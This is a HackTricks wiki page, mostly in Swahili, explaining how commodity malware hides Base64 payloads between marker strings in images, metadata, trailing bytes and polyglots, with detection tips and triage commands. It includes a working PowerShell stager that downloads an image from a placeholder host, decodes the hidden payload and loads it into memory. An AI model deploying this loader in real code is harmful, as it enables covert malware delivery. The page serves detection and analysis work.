Malware & Network Stego

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Sio steganography yote ni pixel LSB; commodity malware mara nyingi huficha payloads ndani ya faili ambazo vinginevyo ni halali.

Mifumo ya vitendo

Marker-delimited payloads katika picha halali

Ikiwa image inapakuliwa na mara moja kuchambuliwa kama text/Base64 na script, payload mara nyingi huwa marker-delimited badala ya pixel-hidden.

Commodity loaders kwa sasa zaidi huficha Base64 payloads kama plain text ndani ya picha ambazo vinginevyo ni halali (mara nyingi GIF/PNG). Badala ya pixel-level LSB, payload hugawanywa kwa unique marker strings zilizowekwa ndani ya file text/metadata. Kisha stager:

• Inapakua picha kupitia HTTP(S)
• Inapata start/end markers
• Inachukua maandishi yaliyopo kati na kui-Base64-decode
• Inapakia/inaendesha katika kumbukumbu

Mfano mfupi wa PowerShell carving snippet:

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Maelezo:

• ATT&CK: T1027.003 (steganography)
• Utambuzi/uwindaji:
• Skana picha zilizopakuliwa kwa ajili ya mistari za delimiter.
• Bainisha scripts zinazopakua images na mara moja kuita routines za decoding za Base64 (PowerShell FromBase64String, JS atob, nk).
• Tazama kwa mismatch za HTTP content-type (image/* response lakini body ina ASCII/Base64 ndefu).

Other high-signal places to hide payloads

Haya kwa kawaida ni haraka zaidi kukagua kuliko content-level pixel stego:

• Metadata: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn segments.
• Trailing bytes: data iliyowekwa baada ya alama rasmi ya mwisho (kwa mfano, baada ya PNG IEND).
• Embedded archives: ZIP/7z embedded au iliyoongezwa na kisha kuchomolewa na loader.
• Polyglots: faili zimetengenezwa ili ziwe halali kwa parsers mbalimbali (kwa mfano, image + script + archive).

Amri za Triage

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

Marejeo:

• Mfano wa Unit 42: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
• MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
• Polyglots za muundo wa faili na mbinu za container: https://github.com/corkami/docs
• Aperi’Solve (stego triage ya mtandaoni): https://aperisolve.com/

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.